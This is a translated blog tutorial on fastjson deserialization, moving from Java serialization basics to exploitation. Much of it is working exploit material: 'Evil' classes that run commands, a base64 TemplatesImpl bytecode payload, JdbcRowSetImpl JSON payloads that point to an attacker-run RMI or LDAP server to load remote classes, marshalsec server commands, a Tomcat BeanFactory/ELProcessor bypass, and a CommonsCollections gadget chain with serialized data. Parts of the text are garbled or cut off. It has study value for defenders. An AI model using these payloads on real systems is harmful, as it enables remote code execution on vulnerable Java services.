Shulou(Shulou.com)05/31 Report--

In this issue, the editor will bring you about how to learn fastjson deserialization from scratch. The article is rich in content and analyzes and narrates it from a professional point of view. I hope you can get something after reading this article.

Introduction to fastjson usage

Fastjson project address: https://github.com/alibaba/fastjson

Used to convert Java POJO objects to and from JSON strings, such as:

User user = new User (); user.setUserName ("Li Si"); user.setAge (24); String userJson = JSON.toJSONString (user)

Output result:

{"age": 24, "userName": "Li Si"}

The above operation of converting an object to a JSON string is serialization, and the operation of instantiating an JSON string into a Java POJO object is called deserialization.

Java deserialization mechanism

JDK provides API to convert Java objects into byte sequences and save them on disk or network transmission, and the receiver can restore the byte sequences to Java objects.

Serializable interface

Define User classes to implement the Serializable interface

Public class User implements Serializable {private static final long serialVersionUID = 1L th private String name; private String sex; public String getName () {return name;} public String getSex () {return sex;} public void setName (String name) {this.name = name;} public void setSex (String sex) {this.sex = sex } private void readObject (ObjectInputStream s) throws ClassNotFoundException, IOException {System.out.println ("User readObject"); s.defaultReadObject ();} private void writeObject (ObjectOutputStream s) throws java.io.IOException {System.out.println ("User writeObject"); s.defaultWriteObject ();} private Object readResolve () {System.out.println ("User readResolve"); return this;}}

The Serializable interface does not have any methods that need to be implemented, it is just an identity. The object of a class needs to be serialized and must implement the Serializable interface. If it is not implemented, an exception java.io.NotSerializableException will be thrown.

The Externalizable interface can also be implemented, and the Externalizable interface inherits from the Serializable interface, and the abstract methods writeExternal and readExternal correspond to the writeObject and readObject methods of the Serializable interface, respectively.

Public interface Externalizable extends java.io.Serializable {/ * * by calling the methods of DataOutput for its primitive values or * calling the writeObject method of ObjectOutput for objects, strings, and arrays. * / void writeExternal (ObjectOutput out) throws IOException; / * The object implements the readExternal method to restore its * contents by calling the methods of DataInput for primitive * types and readObject for objects, strings and arrays. The * readExternal method must read the values in the same sequence * and with the same types as were written by writeExternal. * / void readExternal (ObjectInput in) throws IOException, ClassNotFoundException;} ObjectInputStream and ObjectOutputStream

Use two IO classes, the utility class ObjectInputStream and ObjectOutputStream

User user = new User (); user.setName ("Li Si"); user.setSex ("M"); ObjectOutputStream oo = new ObjectOutputStream (new FileOutputStream (new File ("User.txt"); oo.writeObject (user); ObjectInputStream ois = new ObjectInputStream (new FileInputStream (new File ("User.txt"); User user1 = (User) ois.readObject (); System.out.println (user1.getName () + ":" + user1.getSex ()

Serialization requires a call to ObjectOutputStream's writeObject method, and deserialization requires a call to ObjectInputStream's readObject method.

Output result

User writeObjectUser readObjectUser readResolve Li Si: M

What's amazing about the result is that writeObject, readObject, and readResolve are declared private but are called, which is a convention.

If there are no private writeObject or readObject methods defined in the target class, the default method is called during serialization and deserialization to serialize and deserialize based on the properties in the target class (without transient decorated properties and static variables).

If private writeObject or readObject methods are defined in the target class, serialization and deserialization will be achieved by reflecting calls to the writeObject or readObject methods specified by the target class, such as adding the static variable to the serialization.

ReadResolve is also called through reflection. When a new object is "deserialized" from memory, the readResolve method is automatically called to return the specified object. As you can see from the above results, it is called after readObject, so readResolve can eventually modify the deserialized object. This design is usually used to guarantee singleton rules and prevent serialization from causing problems in generating a second object. Such as:

Public final class MySingleton implements Serializable {private MySingleton () {} private static final MySingleton INSTANCE = new MySingleton (); public static MySingleton getInstance () {return INSTANCE;} private Object readResolve () throws ObjectStreamException {/ / instead of the object we're on, / / return the class variable INSTANCE return INSTANCE;}} fastjson deserialization mechanism Case 1

The standard POJO class is defined as follows, with two attributes, userName and age.

Public class User {private int age; private String userName;public User () {System.out.println ("User construct");} public String getUserName () {System.out.println ("getUserName"); return userName;} public void setUserName (String userName) {System.out.println ("setUserName:" + userName) This.userName = userName;} public int getAge () {System.out.println ("getAge"); return age;} public void setAge (int age) {System.out.println ("setAge:" + age); this.age = age;}}

Perform deserialization

String jsonstr = "{\" age\ ": 24,\" userName\ ":\" Li Si\ "}"; try {JSON.parseObject (jsonstr, User.class);} catch (Exception e) {System.out.println (e.getMessage ());}

Output result:

User constructsetAge:24setUserName: Li Si

The above results prove that fastjson calls the setter method when deserializing.

Case 2public class User {public int age; public String userName; public User () {System.out.println ("User construct");}}

Perform deserialization

String jsonstr = "{\" age\ ": 24,\" userName\ ":\" Li Si\ "}"; try {User user = JSON.parseObject (jsonstr, User.class); System.out.println ("age:" + user.age); System.out.println ("userName:" + user.userName);} catch (Exception e) {System.out.println (e.getMessage ());}

Output result:

User constructage:24userName: Li Si

The visible Filed,fastjson without setter will be assigned correctly.

Case 3

Make Field userName private and do not provide setter

Public class User {public int age; private String userName; public User () {System.out.println ("User construct");} public String getUserName () {return userName;}}

Perform deserialization

String jsonstr = "{\" age\ ": 24,\" userName\ ":\" Li Si\ "}"; try {User user = JSON.parseObject (jsonstr, User.class); System.out.println ("age:" + user.age); System.out.println ("userName:" + user.getUserName ());} catch (Exception e) {System.out.println (e.getMessage ());}

Output result:

User constructage:24userName:null

If the Field is not visible and the setter method is not provided, fastjson will not be assigned by default.

Modify the deserialization code as follows:

String jsonstr = "{\" age\ ": 24,\" userName\ ":\" Li Si\ "}"; try {User user = JSON.parseObject (jsonstr, User.class, Feature.SupportNonPublicField); System.out.println ("age:" + user.age); System.out.println ("userName:" + user.getUserName ());} catch (Exception e) {System.out.println (e.getMessage ());}

Output result:

User constructage:24userName: Li Si

For private Field,fastjson that does not provide setter, parameters need to be explicitly provided when deserialization

Only then will the Feature.SupportNonPublicField be assigned correctly.

Loophole principle

Fastjson supports the use of @ type to specify the target class for deserialization, as shown below:

Public class User {private int age; private String userName; public User () {System.out.println ("User construct");} public String getUserName () {System.out.println ("getUserName"); return userName } public void setUserName (String userName) {System.out.println ("setUserName:" + userName); this.userName = userName;} public int getAge () {System.out.println ("getAge"); return age } public void setAge (int age) {System.out.println ("setAge:" + age); this.age = age;}}

Perform deserialization

ParserConfig.getGlobalInstance (). SetAutoTypeSupport (true); String jsonstr = "{\" @ type\ ":\" test_fastjson.User\ ",\" age\ ": 24,\" userName\ ":\" Li Si\ "}"; try {JSON.parseObject (jsonstr);} catch (Exception e) {System.out.println (e.getMessage ());}

Output result:

User constructsetAge:24setUserName: Li Si getAgegetUserName

The value test_fastjson.User of the JSON string @ type specifies that the JSON string is instantiated as a User object, during which fastjson calls not only setter but also getter.

Suppose there is an Evil class in the code:

Public class Evil {static {System.err.println ("Pwned"); try {String [] cmd = {"calc"}; java.lang.Runtime.getRuntime (). Exec (cmd). WaitFor ();} catch (Exception e) {e.printStackTrace ();}

Perform deserialization

ParserConfig.getGlobalInstance (). SetAutoTypeSupport (true); String jsonstr = "{\" @ type\ ":\" test_fastjson.Evil\ ",\" age\ ": 24,\" userName\ ":\" Li Si\ "}"; try {JSON.parseObject (jsonstr);} catch (Exception e) {System.out.println (e.getMessage ());}

Output result:

Pwned

Vulnerability exploitation

It is difficult to find code like Evil in normal code. Attackers have to find a way to make JVM load constructed malicious classes through existing POJO classes, the whole process is a bit similar to the ROP technique in binary attacks: first bypass the defense of fastjson to generate deserialization attacks, and then complete the attack chain through the middle POJO classes, which are called Gadget.

Assuming that deserialization vulnerabilities already exist in the version and usage of fastjson, let's take a look at common Gadget.

Gadgets species

The target class itself has deserialization logic.

This category takes com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl as an example. For detailed TemplatesImpl analysis, please refer to

Https://www.cnblogs.com/tr1ple/p/12201553.html?utm_source=tuicool

The TemplatesImpl class itself has code logic that deserializes the data of the member variable _ bytecodes as the bytecode of the class.

After deserialization with fastjson, the getter of attribute outputProperties is called to complete the following call chain:

TemplatesImpl.getOutputProperties () TemplatesImpl.newTransformer () TemplatesImpl.getTransletInstance () TemplatesImpl.defineTransletClasses () ClassLoader.defineClass () Class.newInstance ()... MaliciousClass. ()

And the MaliciousClass must be a subclass of com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet.

Define the MaliciousClass as follows

Import com.sun.org.apache.xalan.internal.xsltc.DOM;import com.sun.org.apache.xalan.internal.xsltc.TransletException;import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;import com.sun.org.apache.xml.internal.serializer.SerializationHandler;public class Evil extends AbstractTranslet {static {System.err.println ("Pwned") Try {String [] cmd = {"calc"}; java.lang.Runtime.getRuntime (). Exec (cmd). WaitFor ();} catch (Exception e) {e.printStackTrace () } @ Override public void transform (DOM arg0, SerializationHandler [] arg1) throws TransletException {/ / TODO Auto-generated method stub} @ Override public void transform (DOM arg0, DTMAxisIterator arg1, SerializationHandler arg2) throws TransletException {/ / TODO Auto-generated method stub}

Compile to generate Evil.class, read out the bytecode and encrypt it with base64, as _ bytecodes. Construct the following JSON string.

{"@ type": "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl", "_ bytecodes": ["yv66vgAAADQAPQoADQAcCQAdAB4IAB8KACAAIQcAIggAIwoAJAAlCgAkACYKACcAKAcAKQoACgAqBwArBwAsAQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEACXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEACkV4Y2VwdGlvbnMHAC0BAKYoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvZHRtL0RUTUF4aXNJdGVyYXRvcjtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOylWAQAIPGNsaW5pdD4BAA1TdGFja01hcFRhYmxlBwApAQAKU291cmNlRmlsZQEACUV2aWwuamF2YQwADgAPBwAuDAAvADABAAVQd25lZAcAMQwAMgAzAQAQamF2YS9sYW5nL1N0cmluZwEABGNhbGMHADQMADUANgwANwA4BwA5DAA6ADsBABNqYXZhL2xhbmcvRXhjZXB0aW9uDAA8AA8BABJ0ZXN0X2Zhc3Rqc29uL0V2aWwBAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0AQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAQamF2YS9sYW5nL1N5c3RlbQEAA2VycgEAFUxqYXZhL2lvL1ByaW50U3RyZWFtOwEAE2phdmEvaW8vUHJpbnRTdHJlYW0BAAdwcmludGxuAQAVKExqYXZhL2xhbmcvU3RyaW5nOylWAQARamF2YS9sYW5nL1J1bnRpbWUBAApnZXRSdW50aW1lAQAVKClMamF2YS9sYW5nL1J1bnRpbWU7AQAEZXhlYwEAKChbTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsBABFqYXZhL2xhbmcvUHJvY2VzcwEAB3dhaXRGb3IBAAMoKUkBAA9wcmludFN0YWNrVHJhY2UAIQAMAA0AAAAAAAQAAQAOAA8AAQAQAAAAHQABAAEAAAAFKrcAAbEAAAABABEAAAAGAAEAAAAJAAEAEgATAAIAEAAAABkAAAADAAAAAbEAAAABABEAAAAGAAEAAAAXABQAAAAEAAEAFQABABIAFgACABAAAAAZAAAABAAAAAGxAAAAAQARAAAABgABAAAAHAAUAAAABAABABUACAAXAA8AAQAQAAAAawAEAAEAAAAmsgACEgO2AAQEvQAFWQMSBlNLuAAHKrYACLYACVenAAhLKrYAC7EAAQAIAB0AIAAKAAIAEQAAAB4ABwAAAAsACAANABIADgAdABEAIAAPACEAEAAlABIAGAAAAAcAAmAHABkEAAEAGgAAAAIAGw"], "_ name": "a", "_ tfactory": {}, "outputProperties": {}}

Take fastjson 1.2.24 as an example to deserialize

Try {JSON.parseObject (jsonstr, Object.class, Feature.SupportNonPublicField);} catch (Exception e) {System.out.println (e.getMessage ());}

Output result:

Pwned

Set property error, outputProperties

_ bytecodes is a private attribute, and _ name is also a private domain, so you need to set Feature.SupportNonPublicField when you parseObject, so that the _ bytecodes field can be deserialized. Therefore, the utilization condition of this gadget is harsh, and the idea is worth using for reference.

The field of _ tfactory has neither get method nor set method in TemplatesImpl. It doesn't matter. If we set _ tfactory to {}, fastjson will call its no-parameter constructor to get the _ tfactory object. This solves the problem that in some versions, referencing the _ tfactory attribute in defineTransletClasses () will cause an abnormal exit.

JNDI injection

The mainstream of deserialization Gadget is to use JNDI, at the present stage, they are all using automatic mining Gadget according to JNDI features. How JNDI is injected and whether it can be successfully injected is related to the version of JDK, because JDK has also implemented corresponding mitigation measures to prevent deserialization attacks.

To put it simply, JNDI (Java Naming and Directory Interface) is a set of application program interfaces, which provides a unified general interface for developers to find and access a variety of resources, which can be used to locate users, networks, machines, objects, services and other resources. For example, you can use JNDI to locate a printer on a local area network, or JNDI to locate a database service or a remote Java object. The underlying JNDI supports RMI remote objects, and services registered with RMI can be accessed and invoked through the JNDI interface.

JNDI supports multiple naming and directory providers (Naming and Directory Providers), and the RMI registry service provider (RMI Registry Service Provider) allows access to remote objects registered in RMI through the JNDI application interface. One of the benefits of binding RMI services to JNDI is that it is more transparent, unified, and loosely coupled. RMI clients locate a remote object directly through URL, and the RMI service can be linked to an enterprise directory that contains information about people, organizations, and network resources.

In JNDI services, in addition to binding remote objects directly, the RMI server can also bind an external remote object (an object outside the current name directory system) through the References class. After binding the Reference, the server first obtains the reference to the bound object through Referenceable.getReference () and saves it in the directory. When the client looks up the remote object in lookup (), the client gets the corresponding object factory and finally converts the reference into a concrete object instance through the factory class.

Take com.sun.rowset.JdbcRowSetImpl as an example below. According to the principle of FastJson deserialization vulnerability, when FastJson deserializes a JSON string to a specified Java class, it calls the getter, setter, and other methods of the target class. The setAutoCommit () of the JdbcRowSetImpl class calls the connect () function, which is as follows:

Private Connection connect () throws SQLException {if (this.conn! = null) {return this.conn;} else if (this.getDataSourceName ()! = null) {try {InitialContext var1 = new InitialContext (); DataSource var2 = (DataSource) var1.lookup (this.getDataSourceName ()) Return this.getUsername ()! = null & &! this.getUsername (). Equals ("")? var2.getConnection (this.getUsername (), this.getPassword ()): var2.getConnection ();} catch (NamingException var3) {throw new SQLException (this.resBundle.handleGetObject ("jdbcrowsetimpl.connect"). ToString ()) }} else {return this.getUrl ()! = null?DriverManager.getConnection (this.getUrl (), this.getUsername (), this.getPassword ()): null;}}

Connect () calls InitialContext.lookup (dataSourceName), where the parameter dataSourceName is set in the setter method setDataSourceName (String name). So during the FastJson deserialization vulnerability, we can control the value of dataSourceName, which means that the conditions for JNDI injection exploitation are met.

The process of JNDI injection utilization is as follows:

1. InitialContext.lookup (URI) is called in the object code, and URI is controllable by the user.

2. The attacker controls that the URI parameter is a malicious RMI service address, such as rmi://hacker_rmi_server//name.

3. The attacker RMI server returns a Reference object to the target, and a carefully constructed Factory class is specified in the Reference object.

4. When the target performs the lookup () operation, it will dynamically load and instantiate the Factory class, and then call factory.getObjectInstance () to get the external remote object instance.

5. Attackers can write malicious code in the constructors of Factory class files, static code blocks, getObjectInstance () methods, etc., to achieve the RCE effect.

Here, the target plays the role of a JNDI client, and the attacker implements the attack by building a malicious RMI server.

You can use https://github.com/mbechler/marshalsec to quickly start the RMI/LDAP service.

Compile malicious classes

Public class Exploit {static {System.err.println ("Pwned"); try {String [] cmd = {"calc"}; java.lang.Runtime.getRuntime (). Exec (cmd). WaitFor ();} catch (Exception e) {e.printStackTrace ();}

Get the Exploit.class, deploy it on the HTTP service, and access the download through http://ip:port/Exploit.class.

The following code takes the fastjson1.2.24 version as an example. * * malicious classes can be deployed in either RMI or LDAP.

1 、 RMI

JDK 6u132, JDK 7u122, and JDK 8u113 were previously available.

The attacker returns a JNDI Naming Reference through the RMI service. When decoding the Reference, the victim will load the Factory class at the Codebase remote address we specified, but in principle, it does not use the RMI Class Loading mechanism, so it is not limited by the java.rmi.server.useCodebaseOnly system properties, and is relatively more general.

However, in JDK 6u132, JDK 7u122, and JDK 8u113, Java promotes JNDI to restrict the ability of JNDI Reference to remotely load Object Factory classes in Naming/Directory services. The default values of the system properties com.sun.jndi.rmi.object.trustURLCodebase and com.sun.jndi.cosnaming.object.trustURLCodebase are changed to false, which means that loading Reference factory classes from remote Codebase is not allowed by default. If you need to turn on the remote class loading function of RMI Registry or COS Naming Service Provider, you need to set the values of the two properties mentioned above to true.

Start the RMI service:

Java-cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer http://192.168.50.131:8000/#Exploit 9999

# followed by the class name, and the final parameter is the RMI service listening port

Perform deserialization

String payload = "{\" @ type\ ":\" com.sun.rowset.JdbcRowSetImpl\ ",\" dataSourceName\ ":\" rmi://192.168.50.131:9999/Exploit\ ",\" autoCommit\ ": true}"; try {System.out.println (payload); JSON.parseObject (payload);} catch (Exception e) {System.out.println (e.getMessage ());}

The output result is the same as above, pop up the calculator.

2 、 LDAP

JDK 11.0.1, 8u191, 7u201, 6u211 are available before.

In addition to RMI services, JNDI can also interface with LDAP services, and LDAP can also return JNDI Reference objects. The utilization process is basically the same as the above RMI Reference, except that the URL in lookup () is a LDAP address: ldap://xxx/xxx, and the LDAP server controlled by the attacker returns a malicious JNDI Reference object. And the Reference remotely loading Factory class of LDAP service is not limited by the com.sun.jndi.rmi.object.trustURLCodebase, com.sun.jndi.cosnaming.object.trustURLCodebase and other properties in the previous point, so it can be applied more widely.

However, in October 2018, Java finally fixed this utilization point, adding restrictions on the loading of LDAP Reference remote factory classes, and the default value of the com.sun.jndi.ldap.object.trustURLCodebase property was adjusted to false after Oracle JDK 11.0.1, 8u191, 7u201, and 6u211.

Start the LDAP service:

Java-cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://192.168.50.131:8000/#Exploit 9999

Perform deserialization

String payload = "{\" @ type\ ":\" com.sun.rowset.JdbcRowSetImpl\ ",\" dataSourceName\ ":\" ldap://192.168.50.131:9999/Exploit\ ",\" autoCommit\ ": true}"; try {System.out.println (payload); JSON.parseObject (payload);} catch (Exception e) {System.out.println (e.getMessage ());}

The output result is the same as above, pop up the calculator.

Later version of JDK

Later versions of JDK impose security restrictions, so it's not that easy to execute arbitrary code.

Source code reference https://github.com/kxcode/JNDI-Exploit-Bypass-Demo

Use local Class as Reference Factory

Although malicious Factory cannot be loaded remotely in higher versions (such as JDK8u191 and above), we can still specify Factory Class in the returned Reference, which must be in the local CLASSPATH of the victim target. The factory class must implement the javax.naming.spi.ObjectFactory interface and at least one getObjectInstance () method exists. Org.apache.naming.factory.BeanFactory just meets the conditions and has the possibility of being exploited. Org.apache.naming.factory.BeanFactory exists in the Tomcat dependency package, so it is also widely used.

In getObjectInstance (), org.apache.naming.factory.BeanFactory instantiates any Bean Class that Reference points to by reflection, and calls the setter method to assign values to all properties. The class name, attribute and attribute value of the Bean Class all come from the Reference object and can be controlled by the attacker.

In this case, the target Bean Class must have a no-argument constructor, a setter method of public, and an argument of type String. In fact, these setter don't have to be set... At the beginning of the method, according to the logic in org.apache.naming.factory.BeanFactory, we can force a method to be specified as setter.

Here, we found that javax.el.ELProcessor can be used as the target Class. The utilization code for starting RMI Server is as follows:

Public static void lanuchRMIregister (Integer rmi_port) throws Exception {System.out.println ("Creating RMI Registry, RMI Port:" + rmi_port); Registry registry = LocateRegistry.createRegistry (rmi_port); / * * Payload2: Exploit with JNDI Reference with local factory Class * * / ResourceRef ref = new ResourceRef ("javax.el.ELProcessor", null, ",", true, "org.apache.naming.factory.BeanFactory", null) / / redefine a setter name for the'x 'property from' setX' to 'eval', see BeanFactory.getObjectInstance code ref.add (new StringRefAddr ("forceString", "KINGX=eval")) / / expression language to execute 'nslookup jndi.s.artsploit.com', modify / bin/sh to cmd.exe if you target windows ref.add (new StringRefAddr ("KINGX", "\"\ ".getClass (). ForName (\" javax.script.ScriptEngineManager\ "). NewInstance (). GetEngineByName (\" JavaScript\ "). Eval (\" new java.lang.ProcessBuilder [' (java.lang.String [])] (['calc']). Start ()\ ") / * * Payload2 end * * / ReferenceWrapper referenceWrapper = new ReferenceWrapper (ref); registry.bind ("Exploit", referenceWrapper); System.out.println (referenceWrapper.getReference ());}

"forceString" can force a setter method to be assigned to a property, so here we set the setter method of the property "KINGX" to the ELProcessor.eval () method. The element "KINGX" is added to the ResourceRef and assigned to malicious code that needs to be executed. Finally, calling setter becomes the execution of the following code:

ELProcessor.eval (\ "\" .getClass () .getClass ("javax.script.ScriptEngineManager\") .newInstance () .getEngineByName (\ "JavaScript\") .eval (\ "new java.lang.ProcessBuilder [(java.lang.String [])]] (['calc']) .start ()

ELProcessor.eval () evaluates the EL expression, resulting in the execution of the command.

This bypass method requires the existence of Tomcat-related dependencies in the target environment. Of course, other Java Server may also have Factory classes that can be utilized, which can be further studied.

Org.apache.tomcattomcat-catalina9.0.20org.apache.tomcattomcat-jasper9.0.20

Use LDAP to return serialized data and trigger local Gadget

Java objects are also stored in the LDAP directory in a variety of ways:

Java serialization

JNDI Reference

Marshalled object

Remote Location (deprecated)

LDAP can specify a variety of properties for stored Java objects:

JavaCodeBase

ObjectClass

JavaFactory

JavaSerializedData

...

The javaCodebase attribute can specify a remote URL so that hackers can control the class in deserialization and exploit it through JNDI Reference, which is not allowed by default for higher versions of JDK, as described above. In addition to using JNDI Reference for utilization, LDAP Server also supports returning serialized data of an object directly, and implementing RCE when deserializing on the client side.

The following analysis takes the Apache Commons Collections package as an example, which requires that the package is installed and deployed in the execution environment.

A Transformer class is provided in Apache Commons Collections to convert one object into another. The following three classes are mainly used in vulnerability exploitation:

1 、 InvokeTransformer

Transformer implementation that creates a new object instance by reflection. (returns an object by reflection)

2 、 ChainedTransformer

Transformer implementation that chains the specified transformers together. (connect the transformer into a chain and convert an object through each transformer in the chain in turn.)

3 、 ConstantTransformer

Transformer implementation that returns the same constant each time. (converts an object to a constant and returns)

InvokeTransformer

InvokeTransformer can make function calls through reflection:

InvokerTransformer invokerTransformer = new InvokerTransformer ("exec", new Class [] {String.class}, new Object [] {new String ("calc")}); invokerTransformer.transform (Runtime.getRuntime ())

So the next step is to find a way to call transform.

ConstantTransformer

The transform method of ConstantTransformer directly returns the parameters of the constructor. Such as:

New ConstantTransformer (Runtime.class)

ChainedTransformer

The transform method of ChainedTransformer iterates through the elements in the Transformer array and executes their respective transform methods:

Public Object transform (Object object) {for (int I = 0; I)

< iTransformers.length; i++) { object = iTransformers[i].transform(object); } return object;} 那么现在只需要执行chainedTransformer的transform方法就可以弹出计算器了： Transformer[] transformers = new Transformer[]{ new ConstantTransformer(Runtime.class), new InvokerTransformer("getMethod", new Class[] { String.class, Class[].class }, new Object[] {"getRuntime", new Class[0] }), new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, new Object[0]}), new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"})};Transformer chainedTransformer = new ChainedTransformer(transformers); 需要借助另外的类TransformedMap，该类设计用来作Map的变换。 Map inMap = new HashMap();inMap.put("key", "value");Map outMap = TransformedMap.decorate(inMap, null, chainedTransformer); decorate函数说明及源码 /** * Factory method to create a transforming map. * * If there are any elements already in the map being decorated, they * are NOT transformed. * Constrast this with {@link #decorateTransform}. * * @param map the map to decorate, must not be null * @param keyTransformer the transformer to use for key conversion, null means no transformation * @param valueTransformer the transformer to use for value conversion, null means no transformation * @throws IllegalArgumentException if map is null */public static Map decorate(Map map, Transformer keyTransformer, Transformer valueTransformer) { return new TransformedMap(map, keyTransformer, valueTransformer);} TransformedMap的entry value如果被修改就会执行Transformer的transform方法。而刚好有另外的类sun.reflect.annotation.AnnotationInvocationHandler，该类是java运行库中处理注解的类，包含一个Map对象属性，其readObject方法有自动修改自身Map属性的操作，即反序列化此对象会修改Map对象属性，这样就整个利用链就衔接上了。 生成序列化字节码的代码： import java.io.*;import java.lang.annotation.Retention;import java.lang.annotation.Target;import java.lang.reflect.Constructor;import java.util.HashMap;import java.util.Map;import org.apache.commons.collections.Transformer;import org.apache.commons.collections.functors.ChainedTransformer;import org.apache.commons.collections.functors.ConstantTransformer;import org.apache.commons.collections.functors.InvokerTransformer;import org.apache.commons.collections.map.TransformedMap;public class CommonsCollectionPayload { public static void main(String[] args) throws Exception { /* * Runtime.getRuntime().exec("calc"); */ Transformer[] transformers = new Transformer[]{ new ConstantTransformer(Runtime.class), new InvokerTransformer("getMethod", new Class[] { String.class, Class[].class }, new Object[] {"getRuntime", new Class[0] }), new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, new Object[0]}), new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"}) }; Transformer chainedTransformer = new ChainedTransformer(transformers); Map inMap = new HashMap(); inMap.put("key", "value"); Map outMap = TransformedMap.decorate(inMap, null, chainedTransformer); Class cls = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler"); Constructor ctor = cls.getDeclaredConstructor(new Class[] { Class.class, Map.class }); ctor.setAccessible(true); Object instance = ctor.newInstance(new Object[] { Retention.class, outMap }); FileOutputStream fos = new FileOutputStream("payload.txt"); ObjectOutputStream oos = new ObjectOutputStream(fos); oos.writeObject(instance); oos.flush(); oos.close(); }} 接下来构造LDAP服务，把payload.txt中的序列化字节码（经过Base64转码）放置上去： protected void sendResult ( InMemoryInterceptedSearchResult result, String base, Entry e ) throws LDAPException, MalformedURLException { URL turl = new URL(this.codebase, this.codebase.getRef().replace('.', '/').concat(".class")); System.out.println("Send LDAP reference result for " + base + " redirecting to " + turl); e.addAttribute("javaClassName", "foo"); String cbstring = this.codebase.toString(); int refPos = cbstring.indexOf('#'); if ( refPos >

0) {cbstring = cbstring.substring (0, refPos);} / * * Payload2: Return Serialized Gadget * * / try {e.addAttribute ("javaSerializedData", Base64.decode ("rO0ABXNyABFqYXZhLnV0aWwuSGFzaFNldLpEhZWWuLc0AwAAeHB3DAAAAAI/QAAAAAAAAXNyADRvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMua2V5dmFsdWUuVGllZE1hcEVudHJ5iq3SmznBH9sCAAJMAANrZXl0ABJMamF2YS9sYW5nL09iamVjdDtMAANtYXB0AA9MamF2YS91dGlsL01hcDt4cHQAA2Zvb3NyACpvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMubWFwLkxhenlNYXBu5ZSCnnkQlAMAAUwAB2ZhY3Rvcnl0ACxMb3JnL2FwYWNoZS9jb21tb25zL2NvbGxlY3Rpb25zL1RyYW5zZm9ybWVyO3hwc3IAOm9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5mdW5jdG9ycy5DaGFpbmVkVHJhbnNmb3JtZXIwx5fsKHqXBAIAAVsADWlUcmFuc2Zvcm1lcnN0AC1bTG9yZy9hcGFjaGUvY29tbW9ucy9jb2xsZWN0aW9ucy9UcmFuc2Zvcm1lcjt4cHVyAC1bTG9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5UcmFuc2Zvcm1lcju9Virx2DQYmQIAAHhwAAAABXNyADtvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMuZnVuY3RvcnMuQ29uc3RhbnRUcmFuc2Zvcm1lclh3kBFBArGUAgABTAAJaUNvbnN0YW50cQB+AAN4cHZyABFqYXZhLmxhbmcuUnVudGltZQAAAAAAAAAAAAAAeHBzcgA6b3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLmZ1bmN0b3JzLkludm9rZXJUcmFuc2Zvcm1lcofo/2t7fM44AgADWwAFaUFyZ3N0ABNbTGphdmEvbGFuZy9PYmplY3Q7TAALaU1ldGhvZE5hbWV0ABJMamF2YS9sYW5nL1N0cmluZztbAAtpUGFyYW1UeXBlc3QAEltMamF2YS9sYW5nL0NsYXNzO3hwdXIAE1tMamF2YS5sYW5nLk9iamVjdDuQzlifEHMpbAIAAHhwAAAAAnQACmdldFJ1bnRpbWV1cgASW0xqYXZhLmxhbmcuQ2xhc3M7qxbXrsvNWpkCAAB4cAAAAAB0AAlnZXRNZXRob2R1cQB+ABsAAAACdnIAEGphdmEubGFuZy5TdHJpbmeg8KQ4ejuzQgIAAHhwdnEAfgAbc3EAfgATdXEAfgAYAAAAAnB1cQB+ABgAAAAAdAAGaW52b2tldXEAfgAbAAAAAnZyABBqYXZhLmxhbmcuT2JqZWN0AAAAAAAAAAAAAAB4cHZxAH4AGHNxAH4AE3VyABNbTGphdmEubGFuZy5TdHJpbmc7rdJW5+kde0cCAAB4cAAAAAF0AARjYWxjdAAEZXhlY3VxAH4AGwAAAAFxAH4AIHNxAH4AD3NyABFqYXZhLmxhbmcuSW50ZWdlchLioKT3gYc4AgABSQAFdmFsdWV4cgAQamF2YS5sYW5nLk51bWJlcoaslR0LlOCLAgAAeHAAAAABc3IAEWphdmEudXRpbC5IYXNoTWFwBQfawcMWYNEDAAJGAApsb2FkRmFjdG9ySQAJdGhyZXNob2xkeHA/QAAAAAAAAHcIAAAAEAAAAAB4eHg="));} catch (ParseException E1) {e1.printStackTrace () } / * * Payload2 end * * / result.sendSearchEntry (e); result.setResult (new LDAPResult (0, ResultCode.SUCCESS));}

The rest take advantage of fastjson deserialization vulnerabilities to trigger JNDI injection to complete command execution.

This method of constructing serialized object bytecode is the key, and a tool has been developed for automatic generation: https://github.com/frohoff/ysoserial

For example, java-jar ysoserial-master-30099844c6-1.jar CommonsCollections6 'calc' | base64

Quickly generate bytecode for "pop-up calculator".

This article only introduces one way to use CommonsCollections. In fact, there are many more, which can be found in the source code of ysoserial.
